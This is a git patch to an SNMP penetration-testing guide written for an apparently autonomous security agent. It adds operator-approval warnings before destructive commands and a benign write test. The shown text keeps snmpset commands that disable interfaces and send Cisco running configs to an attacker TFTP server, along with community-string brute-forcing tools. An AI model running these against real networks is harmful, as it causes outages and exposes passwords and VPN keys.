From 504615e820e05ce67ce177e43b9a3f850dc14268 Mon Sep 17 00:00:00 2001 From: sandiyochristan Date: Fri, 7 Aug 2026 00:56:56 +0530 Subject: [PATCH] fix(skills): address Greptile review feedback on SNMP skill - Move operator approval warning BEFORE destructive SET examples so agents encounter the gate before the commands - Add safe autonomous write confirmation using benign sysContact - Fix authNoPriv description: scoped PDU data is unencrypted, but auth passwords are NOT transmitted in plaintext (HMAC-based) - Add Tooling section documenting prerequisites (snmp package, onesixtyone) and noting nmap NSE scripts need no installation --- strix/skills/protocols/snmp.md | 40 ++++++++++++++++++++++++++++------ 1 file changed, 33 insertions(+), 7 deletions(-) diff --git a/strix/skills/protocols/snmp.md b/strix/skills/protocols/snmp.md index a8ce9656..35c9fc2d 100644 --- a/strix/skills/protocols/snmp.md +++ b/strix/skills/protocols/snmp.md @@ -130,17 +130,25 @@ snmpwalk -v2c -c 1.3.6.1.4.1.77.1.2.25 # winUserTable If a write community string (`private`, `write`, etc.) is found: -**Router/Switch Reconfiguration** -```bash -# Change system name -snmpset -v2c -c 1.3.6.1.2.1.1.5.0 s "PWNED" +> **Operator approval required for all write operations below.** Autonomous agents must NOT execute destructive SNMP SET commands without explicit operator authorization. Use only the benign `sysContact` change (shown in the Validation section) for autonomous write-access confirmation. -# Disable an interface (operational disruption) +**Safe Write Confirmation (autonomous)** +```bash +# Benign validation: change sysContact to prove write access +snmpset -v2c -c 1.3.6.1.2.1.1.4.0 s "strix_write_test" +snmpget -v2c -c 1.3.6.1.2.1.1.4.0 # Confirm change +``` + +**Destructive Operations (operator approval required)** +```bash +# ⚠️ DO NOT EXECUTE WITHOUT OPERATOR APPROVAL +# Disable an interface (causes outage) snmpset -v2c -c 1.3.6.1.2.1.2.2.1.7. i 2 ``` -**TFTP Configuration Download (Cisco)** +**TFTP Configuration Download — Cisco (operator approval required)** ```bash +# ⚠️ DO NOT EXECUTE WITHOUT OPERATOR APPROVAL — extracts sensitive configuration # Trigger config backup to attacker TFTP server snmpset -v2c -c 1.3.6.1.4.1.9.2.1.55. s running-config ``` @@ -159,7 +167,7 @@ This retrieves the full router configuration including enable passwords, VPN key **Weak Authentication** - MD5 auth with short/default passwords -- No encryption (authNoPriv) — credentials visible on wire +- No encryption (authNoPriv) — scoped PDU data visible on wire (note: authentication passwords are NOT transmitted in plaintext under authNoPriv; the HMAC-based auth protects credentials, but management data traversing the wire is unencrypted) - DES encryption (known weak) instead of AES **Username Enumeration** @@ -213,6 +221,24 @@ This retrieves the full router configuration including enable passwords, VPN key - **Monitoring subversion** — Fake trap injection triggers false alerts or malicious automated responses - **Compliance violation** — SNMP v1/v2c cleartext on a network violates PCI DSS, HIPAA, and most security frameworks +## Tooling + +The Strix sandbox includes `nmap` (with NSE scripts). Additional tools may need installation: + +```bash +# Net-SNMP tools (snmpwalk, snmpset, snmpget, snmpbulkwalk) +apt-get install -y snmp + +# onesixtyone — fast community string scanner +apt-get install -y onesixtyone + +# Community string wordlists +# SecLists: /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt +# If not available, use nmap's built-in snmp-brute script (no external wordlist needed) +``` + +Prefer `nmap` NSE scripts (`snmp-brute`, `snmp-info`, `snmp-v3-brute`) as the primary approach since they require no additional installation. + ## Pro Tips 1. Always test UDP — SNMP is primarily UDP; TCP-only scans miss it entirely